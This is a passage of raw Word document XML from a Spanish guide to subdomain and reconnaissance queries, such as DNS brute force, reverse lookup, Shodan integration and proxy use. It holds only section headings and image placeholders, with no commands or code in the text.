    <w:p w14:paraId="7647DACD" w14:textId="77777777" w:rsidR="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE"/>
    <w:p w14:paraId="080AFCB8" w14:textId="77777777" w:rsidR="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE"/>
    <w:p w14:paraId="637CC8F3" w14:textId="77777777" w:rsidR="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE"/>
    <w:p w14:paraId="45CBF1BA" w14:textId="77777777" w:rsidR="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE"/>
    <w:p w14:paraId="7DF8EE14" w14:textId="61355A62" w:rsidR="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>🟢</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIVEL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00392FEE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CONSULTAS AVANZADAS (Profesionales)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DD4097" w14:textId="77777777" w:rsidR="00392FEE" w:rsidRPr="00392FEE" w:rsidRDefault="00392FEE" w:rsidP="00392FEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00392FEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8. DNS Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79636DB9" w14:textId="45EEECD6" w:rsidR="00392FEE" w:rsidRDefault="003E63F7" w:rsidP="00392FEE">
      <w:r w:rsidRPr="003E63F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A00A5DB" wp14:editId="1C325C9C">
            <wp:extent cx="6858000" cy="2369185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16175410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10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9E7" w14:textId="77777777" w:rsidR="003E63F7" w:rsidRPr="003E63F7" w:rsidRDefault="003E63F7" w:rsidP="003E63F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E63F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>9. Verificación DNS + Virtual Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F21416" w14:textId="7297D2BC" w:rsidR="003E63F7" w:rsidRDefault="003E63F7" w:rsidP="00392FEE">
      <w:r w:rsidRPr="003E63F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="457C717B" wp14:editId="090183D2">
            <wp:extent cx="6858000" cy="2450465"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="11149447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447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56E6" w14:textId="77777777" w:rsidR="003E63F7" w:rsidRDefault="003E63F7" w:rsidP="00392FEE"/>
    <w:p w14:paraId="69993A47" w14:textId="77777777" w:rsidR="003E63F7" w:rsidRPr="003E63F7" w:rsidRDefault="003E63F7" w:rsidP="003E63F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E63F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10. DNS Reverse Lookup (IPs a Dominios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320ED472" w14:textId="6085C77F" w:rsidR="00392FEE" w:rsidRDefault="00812930" w:rsidP="00392FEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812930">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="074348C7" wp14:editId="6AE205F6">
            <wp:extent cx="6858000" cy="2421890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18861801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801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971D" w14:textId="77777777" w:rsidR="00812930" w:rsidRPr="00812930" w:rsidRDefault="00812930" w:rsidP="00812930">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00812930">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11. Expansión de TLD (Top Level Domains)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C804B8" w14:textId="662AFFE6" w:rsidR="00812930" w:rsidRDefault="00AB4CE0" w:rsidP="00392FEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4CE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AA802A2" wp14:editId="6738673C">
            <wp:extent cx="6858000" cy="2442845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21312693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93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2403" w14:textId="77777777" w:rsidR="00AB4CE0" w:rsidRPr="00AB4CE0" w:rsidRDefault="00AB4CE0" w:rsidP="00AB4CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4CE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>12. Capturar Screenshots de Subdominios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C31EC45" w14:textId="211DF465" w:rsidR="00AB4CE0" w:rsidRDefault="00AB4CE0" w:rsidP="00392FEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4CE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15357C1E" wp14:editId="70D51569">
            <wp:extent cx="6858000" cy="2456180"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="82926783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783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6CA4" w14:textId="77777777" w:rsidR="00AB4CE0" w:rsidRDefault="00AB4CE0" w:rsidP="00AB4CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4CE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>13. Usar Servidor DNS Personalizado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAAEBCF" w14:textId="0B35BA0E" w:rsidR="00F27246" w:rsidRDefault="00F27246" w:rsidP="00AB4CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F27246">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="272F5F17" wp14:editId="1611A1D6">
            <wp:extent cx="6858000" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="15071334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34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7668" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00AB4CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775452D9" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00AB4CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADA8C30" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00AB4CE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5061BE" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077524">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>14. Shodan Integration (Puertos y Banners)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E515C54" w14:textId="134BD99C" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077524">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FE7F98E" wp14:editId="2A660EC9">
            <wp:extent cx="6858000" cy="1795145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="586525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B857" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A47D0E" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C31E3F" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53737749" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A07EB8" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C81933" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F6D8A6" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="628ABD06" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C848E23" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EBAFB5" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D705DA" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69729BA3" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1E224B" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC9C402" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DAB395D" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5820DE78" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239A00DB" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65DD201F" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E27ED5" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8F21C3" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBF4D8A" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190149F7" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A2CA02" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30918C84" w14:textId="77777777" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11137614" w14:textId="2F536E39" w:rsidR="00077524" w:rsidRDefault="00077524" w:rsidP="00077524">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1AD0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00077524">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>🔥</w:t>
      </w:r>
      <w:r w:rsidRPr="00077524">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONSULTAS ULTRA-AVANZADAS (Profesionales Expert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604D5C5E" w14:textId="77777777" w:rsidR="000B4B11" w:rsidRPr="000B4B11" w:rsidRDefault="000B4B11" w:rsidP="000B4B11">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B4B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>15. Reconocimiento Completo (Pentesting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C823D5" w14:textId="4646D2E4" w:rsidR="00077524" w:rsidRDefault="000B4B11" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B4B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26154BD2" wp14:editId="7FF6E2D7">
            <wp:extent cx="5960239" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1700049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9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63639" cy="30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7BEC" w14:textId="77777777" w:rsidR="000B4B11" w:rsidRPr="000B4B11" w:rsidRDefault="000B4B11" w:rsidP="000B4B11">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B4B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>16. Iniciar desde Resultado Específico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FDCFAD" w14:textId="7047CFE5" w:rsidR="000B4B11" w:rsidRDefault="00F9300B" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9300B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DFF7809" wp14:editId="1439C927">
            <wp:extent cx="5706533" cy="1865191"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1905"/>
            <wp:docPr id="14014623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23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12558" cy="18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282" w14:textId="68C5E6C9" w:rsidR="00F9300B" w:rsidRPr="000B4B11" w:rsidRDefault="00F9300B" w:rsidP="00F9300B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B4B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="000B4B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9300B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Búsqueda con Proxies (Anónimo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F545AA" w14:textId="3BE486B4" w:rsidR="00F9300B" w:rsidRDefault="00F9300B" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9300B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49107AB6" wp14:editId="794FB375">
            <wp:extent cx="6858000" cy="2541270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8657993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993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62EE" w14:textId="77777777" w:rsidR="005C2DC3" w:rsidRDefault="005C2DC3" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75FC6598" w14:textId="03351049" w:rsidR="005C2DC3" w:rsidRDefault="005C2DC3" w:rsidP="005C2DC3">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2DC3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.1.9.3.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2DC3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Ejemplo práctico: Auditoría de Seguridad Completa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215FB4C5" w14:textId="275FFA61" w:rsidR="005C2DC3" w:rsidRDefault="0057367A" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057367A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28151143" wp14:editId="03AAAD5F">
            <wp:extent cx="6858000" cy="4391660"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="645878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7888" name="Imagen 1" descr="Tabla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0DD8" w14:textId="77777777" w:rsidR="0057367A" w:rsidRPr="0057367A" w:rsidRDefault="0057367A" w:rsidP="0057367A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057367A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="0057367A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RESUMEN DE PARÁMETROS CRÍTICOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA8F2A3" w14:textId="2A968C6C" w:rsidR="0057367A" w:rsidRDefault="0057367A" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057367A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C95CA19" wp14:editId="4D856A53">
            <wp:extent cx="6858000" cy="3967480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8088197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19772" name="Imagen 1" descr="Tabla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72A1" w14:textId="1BD30C6F" w:rsidR="009A31BB" w:rsidRPr="009A31BB" w:rsidRDefault="009A31BB" w:rsidP="009A31BB">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2DC3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2DC3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2DC3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Ejemplo práctico: Auditoría de Seguridad Completa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588947A" w14:textId="140AB9AF" w:rsidR="0057367A" w:rsidRDefault="009A31BB" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A31BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A8236F4" wp14:editId="06C4E813">
            <wp:extent cx="6858000" cy="2470150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="7931815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81582" name="Imagen 1" descr="Captura de pantalla de computadora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15DF" w14:textId="6554BE20" w:rsidR="00E1466F" w:rsidRDefault="00E1466F" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E1466F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
